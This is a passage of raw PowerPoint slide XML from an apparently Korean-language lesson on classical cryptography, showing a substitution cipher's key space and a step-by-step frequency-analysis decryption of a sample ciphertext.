          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2660545" y="5803206"/>
            <a:ext cx="6431011" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>시저</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 암호보다 키의 종류가 훨씬 많다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. -&gt; 26! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="그룹 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5DEE182-52FC-4E34-8E7A-43DA088E53B8}"/>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E166D42-530B-49EB-82CB-AC2FA3E917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79B994F-F2A7-4FFF-B661-70A997FB034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3" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D25A9A3-4EFC-406B-8B1A-C1C1F421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화살표: 오른쪽 15">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78AABE2A-ADC1-49CC-82E7-AE1BF0256CE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0760137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11" name="Picture 2" descr="양피지 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{509DEE3F-B140-4304-B622-6BEC4B811A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8" y="213357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B59151-DF87-4116-A939-ACDB6FE7F968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281259" y="2200143"/>
            <a:ext cx="4007178" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>ME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>LGVIWAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>OPIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>ZGW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>EGMZRUU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>PZAIXILGVSIZZMPGKKDWO MEPGROEIWGPCEIPAMDKKEYCIUYMGIFRWCEGLOPINYZHRZMPDN YWDWOGWITDWYSEDCEEIAFYYWMPIDWYAGTYPIKGLMXFPIWCEHR ZMMEYMEDWOMGQRYWCEUXMEDPZMQRGMEEYAPISDWOFICJILYS NICYZEYMGGJIPRWIWAIHRUNIWAHRZMUDZZYAMEYFRWCEMRPWD WOPGRWAIOIDWSDMEIGWYMSGMEPYYEYHRUNYARNFRMSDMEWG OPYIMYPZRCCYZZIOIDWIWAIOIDWEYMPDYAILMYPMEYMWUNMDW OUGPZYKFRMIMKIZMEIAMGODTYDMRNIWASIKJYAISIXSDMEEDZWG ZYDWMEYIDPZIXDWODIUZRPYMEYXIPYZGRPDMDZYIZXMGAYZNDZ YSEIMXGRCIWWGMOYM </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82B9528-A607-475B-8002-06260CAE85F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7243767" y="4508739"/>
            <a:ext cx="4079379" cy="2197728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{424CE517-5F97-4DCF-8C32-57E4BF54066E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7243767" y="1840749"/>
            <a:ext cx="3735713" cy="2619146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A39759F7-5D70-4534-96ED-9D17D5B29604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705773" y="3884159"/>
            <a:ext cx="940494" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>암호문</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="화살표: 오른쪽 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D24EE5B-59A6-4A28-847E-99CA7D77E26A}"/>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extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F7F6AD-E488-41E1-8EA8-D8112D56F2DE}"/>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7" y="4598969"/>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81258" y="4665535"/>
            <a:ext cx="4007178" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>MEeLGVIWAMEeOPINeZGWeEGMZRUUePZAIXILGVSIZZMPGKKDWO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ZMMEeMEDWOMGQReWCEUXMEDPZMQRGMEEeAPISDWOFICJILeS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>NICeZEeMGGJIPRWIWAIHRUNIWAHRZMUDZZeAMEeFRWCEMRPWD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OPeIMePZRCCeZZIOIDWIWAIOIDWEeMPDeAILMePMEeMWUNMDWO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>UGPZeKFRMIMKIZMEIAMGODTeDMRNIWASIKJeAISIXSDMEEDZWGZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>eDWMEeIDPZIXDWODIUZRPeMEeXIPeZGRPDMDZeIZXMGAeZNDZe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130376" y="6337135"/>
            <a:ext cx="4444775"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Y-&gt;e</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EBAA354-546D-4CC8-A633-7ADDE34A290A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8698381" y="2018138"/>
            <a:ext cx="1170149" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>빈도분석</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="그룹 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3D4CCD6-23CD-41EE-9D96-47CC25B213B1}"/>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EF7B356C-2C72-4D85-84EE-31281A821A3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D380754-F030-4C99-823F-E1561AB783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D68DEB0A-88C6-495C-A8C6-8F3D38910B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7F5CB4C3-52BB-4C32-8DB9-1024F63D7E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8247767" y="1849315"/>
            <a:ext cx="93421" cy="26674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화살표: 오른쪽 19">
            <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7258A388-7297-40DD-9EAB-0B98CB5970B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79933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403"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62404" y="2092017"/>
            <a:ext cx="4007178" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>LGVIWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>MEDWOMGQReWCEUXMEDPZMQRGMEEeAPISDWOFICJILeS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>NICeZEeMGGJIPRWIWAIHRUNIWAHRZMUDZZeA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>MWUNMDWO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>UGPZeKFRMIMKIZMEIAMGODTeDMRNIWASIKJeAISIXSDMEEDZWGZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>eDW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>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498022" y="3796722"/>
            <a:ext cx="3553906"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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="화살표: 오른쪽 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DD39667-A9BF-4B6D-A4DF-CFB621BB8FDD}"/>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Picture 2" descr="양피지 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF1EB7B7-E5DA-4210-8FC1-20CAA7668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442"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18B237A-BDE3-4A84-9C0F-BB01562A6F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7083443" y="2092017"/>
            <a:ext cx="4007178" cy="1338828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>theLGVIWAtheOPINeZGWehGtZRUUePZAIXILGVSIZZtPGKKDWOthPG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>ROhIWGPChIPAtDKKheCIUetGIFRWChGLOPINeZHRZtPDNeWDWOG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WITDWeShDChhIAFeeWtPIDWeAGTePIKGLtXFPIWChHRZtthethDWOt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>GQReWChUXthDPZtQRGthheAPISDWOFICJILeSNICeZhetGGJIPRWI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WAIHRUNIWAHRZtUDZZeAtheFRWChtRPWDWOPGRWAIOIDWSDthIG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WetSG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thPee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>heHRUNeARNFRtSDthWGOPeItePZRCCeZZIOIDWIWAIOI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>DWhetPDeAILtePthetWUNtDWOUGPZeKFRtItKIZthIAtGODTeDtRNIWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>SIKJeAISIXSDthhDZWGZeDWtheIDPZIXDWODIUZRPetheXIPeZGRPDt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>DZeIZXtGAeZNDZeShItXGRCIWWGtOet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650ABE02-B583-442C-9FE2-55D96265BE39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7319061" y="3796722"/>
            <a:ext cx="3553906" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>“The” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>점검</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: M-&gt;t, E-&gt;h </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="화살표: 오른쪽 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91CD18CC-72BA-42C0-9475-47F3DE8C59CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8850891" y="4271705"/>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Picture 2" descr="양피지 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE3CBA4-C06C-402C-AABA-B62CD6D23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7372" y="471739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3532C6F-BC3B-4C14-A945-41A654D26DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7087373" y="4783963"/>
            <a:ext cx="4007178" cy="1338828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>theLGVIWAtheOrINeZGWehGtZRUUerZAIXILGVSIZZtrGKKDWOthrG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>ROhIWGrChIrAtDKKheCIUetGIFRWChGLOrINeZHRZtrDNeWDWOG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WITDWeShDChhIAFeeWtrIDWeAGTerIKGLtXFrIWChHRZtthethDWOt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>GQReWChUXthDrZtQRGthheArISDWOFICJILeSNICeZhetGGJIrRWI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WAIHRUNIWAHRZtUDZZeAtheFRWChtRrWDWOrGRWAIOIDWSDthIG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WetSGthreeheHRUNeARNFRtSDthWGOreIterZRCCeZZIOIDWIWAIOI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>DWhetrDeAILterthetWUNtDWOUGrZeKFRtItKIZthIAtGODTeDtRNIWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>SIKJeAISIXSDthhDZWGZeDWtheIDrZIXDWODIUZRretheXIreZGRrDt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>DZeIZXtGAeZNDZeShItXGRCIWWGtOet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
